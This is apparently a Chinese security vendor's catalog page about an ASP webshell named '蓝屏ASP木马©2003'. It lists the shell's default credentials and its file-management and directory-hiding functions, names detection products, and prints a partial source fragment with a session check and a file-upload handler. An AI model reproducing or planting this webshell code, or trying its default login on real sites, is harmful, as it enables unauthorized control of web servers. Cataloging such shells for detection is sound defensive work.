蓝屏ASP木马©2003

2011-12-23 15:57:16 来源:本站原创,请勿转载 浏览:323
蓝屏ASP木马©2003

木马名称:蓝屏ASP木马©2003
木马格式:asp
默认密码:名字(bai),密码(peng)
木马作用:文件管理,建立畸形目录已达到隐藏木马的效果。

运行界面如下:(图片若超出屏幕,请右键另存到本地查看)

总结:蓝屏ASP木马©2003 主要是文件管理功能,建立畸形目录,危险。
防御方法:护卫神入侵防护系统、护卫神云查杀均可查杀 蓝屏ASP木马©2003 这个asp网页木马。

以下是蓝屏ASP木马©2003代码片段:
<%@codepage=936%>
<head>
<style>body{font-size:9pt;color:blue}table{font-family:宋体;font-size:9pt}a{font-family:宋体;font-size:9pt;color:blue;text-decoration:none}a:hover{font-family:宋体;color:red;text-decoration:none}input{BORDER-RIGHT:blue 1px solid;BORDER-TOP:blue 1px solid;BACKGROUND:white;BORDER-LEFT:blue 1px solid;BORDER-BOTTOM:blue 1px solid;FONT-FAMILY:Verdana,Arial font-color:white;FONT-SIZE:9pt;}</style><%Response.Expires=0
Co=Request.ServerVariables("URL")
zc="<b>蓝屏ASP木马&copy2003"
if session("lZ")="lk"then
Session.TimeOut=50
Session(Co)=0
if request("up")=1 then
Server.ScriptTimeOut=3000%><SCRIPT RUNAT=SERVER LANGUAGE=VBSCRIPT>dim zh
CLASS zha
dim isForm,isFile
Public function Form(strForm)
Form=isForm(lcase(strForm))
if not isForm.exists(strForm)then Form=""
end function
Public function File(strFile)
File=isFile(lcase(strFile))
if not isFile.exists(strFile)then File=new FileInfo
end function
Private Sub CLASS_Initialize
dim Rq,sStart,vbCrlf,sInfo,iInfoStart,iInfoEnd,tZ,iStart,theFile,iFileSize,sFilePath,sFileType,sFormValue,sFileName,iFindStart,iFindEnd,iFormStart,iFormEnd,sFormName
set isForm=CreateObject("Scripting.Dictionary")
set isFile=CreateObject("Scripting.Dictionary")
set tZ=CreateObject("adodb.stream")
set zh=CreateObject("adodb.stream")
zh.Type=1
zh.Mode=3
zh.Open
zh.Write Request.BinaryRead(Request.TotalBytes)
zh.Position=0
Rq=zh.Read
iFormStart=1
iFormEnd=LenB(Rq)
vbCrlf=chrB(13)&chrB(10)
sStart=MidB(Rq,1,InStrB(iFormStart,Rq,vbCrlf)-1)
iStart=LenB(sStart)
iFormStart=iFormStart+iStart+1
while (iFormStart+10)<iFormEnd
iInfoEnd=InStrB(iFormStart,Rq,vbCrlf&vbCrlf)+3
tZ.Type=1
tZ.Mode=3
tZ.Open
zh.Position=iFormStart
zh.CopyTo tZ,iInfoEnd-iFormStart
tZ.Position=0
tZ.Type=2
tZ.Charset="gb2312"
sInfo=tZ.ReadText
tZ.Close
iFormStart=InStrB(iInfoEnd,Rq,sStart)
iFindStart=InStr(22,sInfo,"name=""",1)+6
iFindEnd=InStr(iFindStart,sInfo,"""",1)
sFormName=lcase(Mid(sinfo,iFindStart,iFindEnd-iFindStart))
if InStr(45,sInfo,"filename=""",1)>0 then

(0)
(0)